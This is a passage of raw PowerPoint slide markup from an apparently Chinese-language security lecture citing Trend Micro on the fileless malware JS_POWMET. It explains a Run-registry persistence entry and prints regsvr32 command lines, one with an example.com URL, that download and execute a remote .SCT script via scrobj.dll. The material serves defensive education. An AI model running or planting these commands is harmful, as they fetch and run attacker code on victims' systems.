                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKEY_CURRENT_USER\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\Run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00A249"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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COM+ = “regsvr32 /s /n /u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>此處為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JS_POWMET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>的下載網址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>scrobj.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00A249"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這個在開機時會自動啟動程式的系統登錄機碼將使得「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>」這個系統程式到網路上下載 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JS_POWMET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>惡意程式。</a:t>
            </a:r>
          </a:p>
          <a:p>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43</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JS_POWMET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>trendMicro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2813048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9" y="2420888"/>
            <a:ext cx="8496944" cy="4104456"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>以下是「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>」程式的各個參數說明：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>安靜模式，告訴 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>不要顯示訊息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>告訴 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>不要使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DllRegisterServer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00A249"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>解除伺服器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>物件的註冊</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>用來傳遞選擇性參數 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>網址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>給 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>DLLinstall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00A249"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的腳本執行元件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在這項技巧中，歹徒將惡意程式的網址當成參數傳給 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，讓 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>從該網址下載 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JS_POWMET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這是一個內含惡意 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。歹徒就是利用這樣的方式讓 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>執行任何惡意腳本而不需將惡意檔案儲存到電腦系統上。不僅如此，每當受感染的電腦開機啟動時，都會自動從歹徒架設在網路上的幕後操縱 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>C&amp;C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>伺服器下載惡意檔案。</a:t>
            </a:r>
          </a:p>
          <a:p>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44</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JS_POWMET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>trendMicro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1601850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07504" y="2675467"/>
            <a:ext cx="9036496" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Execute the specified remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.SCT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> script with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scrobj.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  regsvr32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/s /n /u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i:http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://example.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>file.sct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
